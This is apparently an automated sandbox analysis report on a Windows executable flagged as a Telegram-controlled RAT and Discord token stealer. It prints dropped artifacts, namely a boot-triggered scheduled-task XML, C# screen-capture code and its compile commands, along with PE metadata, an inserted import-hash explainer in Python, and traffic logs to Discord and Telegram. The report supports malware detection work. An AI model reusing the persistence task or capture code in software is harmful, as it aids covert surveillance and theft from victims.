                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1004
                                                                                                                                                          Entropy (8bit):4.154581034278981
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                          MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):609
                                                                                                                                                          Entropy (8bit):5.349852899577312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5923fT:p37Lvkmb6KOkqe1xBkrk+ikqEWZE2xH
                                                                                                                                                          MD5:D3D567294682D009698EFCE54AC44C59
                                                                                                                                                          SHA1:279A6E9B70AAD25FEBFE7FB945DC4B3BA7BE4F34
                                                                                                                                                          SHA-256:2BC24183A5BA84A15BEF1A4F5320874146E5F5C12FF82F839A934D29C742580C
                                                                                                                                                          SHA-512:9717CFBE997261D49F2B939B5C93EF51DD2223BB7CE59109607377519828BAA2A647AD91C2B5092B8DF003C432D5854756FC3418DB7645C2A90307AE29DB0EDD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.0.cs"
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1151
                                                                                                                                                          Entropy (8bit):5.4995333953599035
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:KLeId3ka6KOkqeFkqlE2xOKax5DqBVKVrdFAMBJTH:2ekka6NkqeFkqlE2xOK2DcVKdBJj
                                                                                                                                                          MD5:045B77246CA541A2A0C820C83DE18B27
                                                                                                                                                          SHA1:8C990B77CEB68123B5347256B2C8FDA497EDA350
                                                                                                                                                          SHA-256:47CC7DC4E15E1BB8D0C3B26E6C033761D521F3624598EBB06B28797AB0F0CCE2
                                                                                                                                                          SHA-512:B567AB2AB47ED2A1A372AA557B01BA917A4686BBBF3D921147FA5288CEA6F2F986ECBD7303D2912FBE6CCD3FCCEC2A217657D95C3EFEE148913AB7BB41A04972
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zcrbnhje\zcrbnhje.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lon
                                                                                                                                                          Process:C:\ProgramData\main.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5872344
                                                                                                                                                          Entropy (8bit):7.487098820179109
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR65:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciN
                                                                                                                                                          MD5:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                                                                                          SHA1:5E980079F67215BF69B8C1C16B56F40BF4A29958
                                                                                                                                                          SHA-256:E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
                                                                                                                                                          SHA-512:8CEF1184120E010421D69FCF271822B3F0B45E34A1565152A3F2DECB8F500D0E69DE9816D9075683FCFB0F431713F3FBC42AC2D87503CDCDDE125ABA3FA1635D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Entropy (8bit):7.999879548396559
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:DevxExecutor.exe
                                                                                                                                                          File size:46'285'824 bytes
                                                                                                                                                          MD5:e4897ef7419e128b1f7473119ce0bd07
                                                                                                                                                          SHA1:5aad252412a5923438f30cb9c397731a9b020121
                                                                                                                                                          SHA256:6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581
                                                                                                                                                          SHA512:db66ea2cb3f5f30934ab071e1dd2e7b41f6dc5c4be125f1d2d6aab627b3be8b6cf8fcbed517a414cdf037a068414b178176edba2e28de6419b65269e0abb162c
                                                                                                                                                          SSDEEP:786432:NCZkrrfdktmLX8t8lBBvUPlZIOPuOI64zlNWtVMoOIsuXzfVib4a9BWN:N4GlkcLMtUzilKUINzmtVkMfWo
                                                                                                                                                          TLSH:37A733429A917DE172450DF1C5C8C6AC62E2CED81B8D9720F11BCFDF4689FB4992BA4C
                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                          Entrypoint:0x30259ee
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x663BDAF9 [Wed May 8 20:05:13 2024 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                                                                                          OS Version Major:4
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:4
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the bytes following the jmp are zero padding, which the disassembler decodes as this instruction)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2c25994 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c26000 | 0x4d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c28000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2c239f4 | 0x2c23a00 | a0d9d82b4a150b1c332ce4b2032fb759 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x2c26000 | 0x4d8 | 0x600 | dc71992499429b89f0fa84bba5e2e402 | False | 0.375 | data | 3.7395959982028026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c28000 | 0xc | 0x200 | c295a8908b5f91495fbc3820a1c2a33c | False | 0.044921875 | data | 0.12227588125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x2c260a0 | 0x244 | data | - | - | 0.4706896551724138
RT_MANIFEST | 0x2c262e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
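The import table above holds a single entry, mscoree.dll!_CorExeMain, and the entry point is one `jmp dword ptr [00402000h]` through the IAT directory at RVA 0x2000. That is the native bootstrap every 32-bit managed PE carries, so the Import Hash printed in the header is the value shared by all such assemblies and cannot be used to pivot to related samples. The following added example (not Joe Sandbox's code and not part of the report) recomputes the import hash with the pefile algorithm from the values on this page, flags the generic CLR stub, and checks that the entry-point jmp really lands in the IAT. The image base 0x400000 is an assumption: it is not printed in this section, it is simply the value under which the jmp operand lines up with the IAT RVA.

```python
import hashlib


def imphash(imports):
    """Import hash (imphash) as pefile computes it: for each import, lowercase the
    module name and drop a .dll/.ocx/.sys extension, lowercase the function name
    (ordinal imports become "ordN"), join "module.function" in import-table order
    with commas, and MD5 the resulting string."""
    parts = []
    for module, func in imports:
        lib = module.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        name = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{lib}.{name}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def is_dotnet_loader_stub(imports):
    """True when the import table is nothing but the CLR bootstrap import that
    every managed PE carries (mscoree!_CorExeMain for EXEs, _CorDllMain for DLLs).
    Such a table says nothing about the sample's behaviour: managed code resolves
    its Win32 APIs through the runtime, not through the IAT."""
    if len(imports) != 1:
        return False
    module, func = imports[0]
    return (module.lower() == "mscoree.dll" and isinstance(func, str)
            and func.lower() in ("_corexemain", "_cordllmain"))


def stub_jmp_hits_iat(jmp_operand_va, image_base, iat_rva, iat_size):
    """The native entry point of a 32-bit managed PE is one `jmp dword ptr [X]`
    through the IAT slot the loader fills with mscoree!_CorExeMain. Return True
    when the jmp operand, converted to an RVA, lies inside the IAT directory."""
    rva = jmp_operand_va - image_base
    return iat_rva <= rva < iat_rva + iat_size


# Values taken from the report above.
REPORT_IMPORTS = [("mscoree.dll", "_CorExeMain")]   # the only DLL/import listed
REPORT_IMPHASH = "f34d5f2d4577ed6d9ceec516c1f5a744"  # Import Hash field
JMP_OPERAND_VA = 0x00402000                          # jmp dword ptr [00402000h]
IAT_RVA, IAT_SIZE = 0x2000, 0x8                      # IMAGE_DIRECTORY_ENTRY_IAT
# ASSUMPTION: image base 0x400000. It is not printed in this section; it is the
# value under which the jmp operand lines up with the IAT RVA.
IMAGE_BASE = 0x400000

if __name__ == "__main__":
    h = imphash(REPORT_IMPORTS)
    print("computed imphash:", h, "matches report:", h == REPORT_IMPHASH)
    print("generic .NET loader stub (imphash unusable as a pivot):",
          is_dotnet_loader_stub(REPORT_IMPORTS))
    print("entry-point jmp goes through the IAT:",
          stub_jmp_hits_iat(JMP_OPERAND_VA, IMAGE_BASE, IAT_RVA, IAT_SIZE))
```

When the stub check returns True, the analyst should pivot on the section MD5s, the resource hashes or the network indicators instead of the import hash, and read the managed metadata (the COM descriptor at RVA 0x2008) for the real list of P/Invoke targets.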
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 9, 2024 17:47:34.995094061 CEST | 49716 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:47:35.147444963 CEST | 80 | 49716 | 208.95.112.1 | 192.168.2.5
May 9, 2024 17:47:35.147620916 CEST | 49716 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:47:35.148781061 CEST | 49716 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:47:35.301635027 CEST | 80 | 49716 | 208.95.112.1 | 192.168.2.5
May 9, 2024 17:47:35.369262934 CEST | 49716 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:47:39.715002060 CEST | 49718 | 443 | 192.168.2.5 | 185.199.108.133
May 9, 2024 17:47:39.715033054 CEST | 443 | 49718 | 185.199.108.133 | 192.168.2.5
May 9, 2024 17:47:39.715090036 CEST | 49718 | 443 | 192.168.2.5 | 185.199.108.133
May 9, 2024 17:47:39.733352900 CEST | 49718 | 443 | 192.168.2.5 | 185.199.108.133
May 9, 2024 17:47:39.733372927 CEST | 443 | 49718 | 185.199.108.133 | 192.168.2.5
May 9, 2024 17:47:40.048959970 CEST | 443 | 49718 | 185.199.108.133 | 192.168.2.5
May 9, 2024 17:47:40.049036980 CEST | 49718 | 443 | 192.168.2.5 | 185.199.108.133
May 9, 2024 17:47:40.054616928 CEST | 49718 | 443 | 192.168.2.5 | 185.199.108.133
May 9, 2024 17:47:40.054641008 CEST | 443 | 49718 | 185.199.108.133 | 192.168.2.5
May 9, 2024 17:47:40.054896116 CEST | 443 | 49718 | 185.199.108.133 | 192.168.2.5
May 9, 2024 17:47:40.165452957 CEST | 49718 | 443 | 192.168.2.5 | 185.199.108.133
May 9, 2024 17:47:40.208127022 CEST | 443 | 49718 | 185.199.108.133 | 192.168.2.5
May 9, 2024 17:47:40.482240915 CEST | 443 | 49718 | 185.199.108.133 | 192.168.2.5
May 9, 2024 17:47:40.482347012 CEST | 443 | 49718 | 185.199.108.133 | 192.168.2.5
May 9, 2024 17:47:40.482929945 CEST | 49718 | 443 | 192.168.2.5 | 185.199.108.133
May 9, 2024 17:47:40.488842964 CEST | 49718 | 443 | 192.168.2.5 | 185.199.108.133
May 9, 2024 17:47:44.666145086 CEST | 49716 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:48:13.972594023 CEST | 49739 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:48:14.125066042 CEST | 80 | 49739 | 208.95.112.1 | 192.168.2.5
May 9, 2024 17:48:14.125196934 CEST | 49739 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:48:14.125292063 CEST | 49739 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:48:14.336010933 CEST | 80 | 49739 | 208.95.112.1 | 192.168.2.5
May 9, 2024 17:48:14.414586067 CEST | 80 | 49739 | 208.95.112.1 | 192.168.2.5
May 9, 2024 17:48:14.476172924 CEST | 49739 | 80 | 192.168.2.5 | 208.95.112.1
May 9, 2024 17:48:14.955830097 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:14.955851078 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:14.955940008 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:14.981659889 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:14.981678963 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:15.295559883 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:15.299536943 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:15.299551964 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:15.300623894 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:15.300714970 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:15.301388979 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:15.301460981 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:15.320909977 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:15.320916891 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:15.320981979 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:15.321008921 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:15.321125031 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:15.321156025 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
May 9, 2024 17:48:15.321300983 CEST | 49742 | 443 | 192.168.2.5 | 162.159.138.232
May 9, 2024 17:48:15.321335077 CEST | 443 | 49742 | 162.159.138.232 | 192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321491003 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321506023 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321633101 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321647882 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321665049 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321671009 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321683884 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321695089 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321749926 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321762085 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321778059 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321799040 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321810961 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321923971 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321945906 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.368117094 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.369259119 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369277000 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369323969 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369323969 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369342089 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369358063 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.416115999 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.418930054 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.418951035 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.418966055 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.418982029 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.418992996 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.419035912 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.460118055 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.469182968 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469207048 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469222069 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469233990 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469249964 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469286919 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469337940 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469357014 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469409943 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469424009 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.512115955 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.512298107 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.513039112 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.513053894 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.556116104 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.626804113 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.626971960 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.626990080 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.627098083 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.627134085 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.627206087 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.779891968 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.933403969 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.635812044 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.635902882 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.635931015 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.635978937 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:16.636002064 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.636013985 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.636053085 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:16.639477968 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:16.800790071 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:16.800801039 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.800889015 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:16.846529007 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:16.846549988 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.465543032 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.466062069 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.466078043 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.467243910 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.467363119 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.476859093 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.476942062 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477196932 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477211952 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477260113 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477274895 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477375031 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477411985 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477530956 CEST49746443192.168.2.5149.154.167.220
